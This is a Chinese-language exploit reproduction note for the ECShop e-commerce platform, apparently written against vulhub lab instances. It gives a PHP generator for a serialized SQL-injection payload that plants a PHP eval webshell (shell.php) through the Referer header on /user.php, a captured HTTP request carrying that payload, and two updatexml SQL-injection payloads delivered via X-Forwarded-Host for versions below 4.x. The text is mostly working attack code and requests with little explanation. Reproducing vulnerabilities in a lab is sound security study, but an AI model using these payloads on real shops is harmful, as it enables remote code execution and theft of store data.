ECShop

1.漏洞复现

xianzhi-2017-02-82239600(vulhub)

访问 http://IP:8080 和 http://IP:8081 对 2.x 和 3.x 版本进行安装

数据库主机填mysql，密码填root

使用PHP脚本生成Payload

<?php
$shellname = 'shell.php';
$shellcode = '<?php @eval($_POST[1]);?>';

$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; //固定
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$webshell = base64_encode("file_put_contents('$shellname','$shellcode')");
$shell = bin2hex('{$asd\'];assert(base64_decode(\''.$webshell.'\'));//}xxx');
$id = "-1' UNION/*";
$arr = [
    'num' => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    'id' => $id
];
$s = serialize($arr);

echo 'Payload for 2.x:<br>';
echo "{$hash2}ads|{$s}{$hash2}";
echo '<br><br>Payload for 3.x:<br>';
echo "{$hash3}ads|{$s}{$hash3}";

用户登录页面抓包根据版本添加Referer为Payload写入PHP一句话木马

GET /user.php HTTP/1.1
Host: 192.168.135.131:8080
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:161:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f64652827634768776157356d627967702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Upgrade-Insecure-Requests: 1
Connection: close

一句话木马路径：/shell.php

collection_list-sqli

影响范围：ECShop < 4.x

同样安装，/user.php注册用户hacker

用户中心->我的收藏抓包添加X-Forwarded-Host为Payload

两种Payload：

45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|